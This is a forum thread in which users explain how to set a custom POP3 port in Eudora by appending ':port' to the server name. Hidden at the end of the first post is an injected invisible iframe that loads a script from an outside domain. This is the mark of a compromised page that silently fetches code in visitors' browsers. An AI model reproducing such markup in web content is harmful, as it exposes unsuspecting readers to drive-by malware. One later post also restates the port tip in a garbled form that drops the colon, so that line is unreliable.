+ Reply to Thread

How to change port POP3 Eudora mail uses?

Anyone know of a way to change the port that Eudora mail uses to connect a POP3 server. The standard port is 110, my server uses a customized port number. I didn’t see any options to change this in preferences.

Is there a script or file that could possibly be edited or perhaps a different email client with this functionality?

Thanks!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Just an Idea... Try specifying the port with the servername. Like mail.myserver.com:1234 --- I'm not sure if it will work but worth a shot. Good luck.
    iPhone therefore iAm.

Thanks! After an extensive search I found some similar information.

I have tested it and it does work.

So to change default port for Eudora Mail from 110 to one your ISP specifies, do the following:

Start Eudora Mail app > Select Options > Accounts > Select account to modify then on Basic tab modify incoming server to read: mail.yourserver.comxxx where xxxx is the port number.

Cheers! :drink1

Originally posted by Steve
    Just an Idea... Try specifying the port with the servername. Like mail.myserver.com:1234 --- I'm not sure if it will work but worth a shot. Good luck.
    Great call Steve.... you are on a roll!

I'm a SnapperMail man (where setting the port is a field of its own), but it did bug me that I couldn't send outgoing mail from Eudora e-mail because of the port issue. Now I'll probably never use Eudora again................... but at least I know it works if someday I need it for an emergency to send an e-mail
    Please visit my picture site: Robert-O-Rama :)

I agree with that --- I like to make everything work just cause Its there and I can!
    iPhone therefore iAm.

I agree with that --- I like to make everything work just cause Its there and I can!
    lol... exactly!
    Please visit my picture site: Robert-O-Rama :)

Steve, you rock man!

I run my own mail server, but I use a different port for outgoing mail that does not originate on my LAN then I use for for incoming mail. Works fine on the laptop, but I have been unable to get it to work with Eudora mail, and although MobileMail supports changing the port, it only does if the server supports ESMTP. It is sending a command that my server doesn't understand when I select ESMTP. I used this trick in Eudora and it is working great. No more need for airbridge.net for me....

Thanks,

Alan

Your welcome!

Glad you have it working.
    iPhone therefore iAm.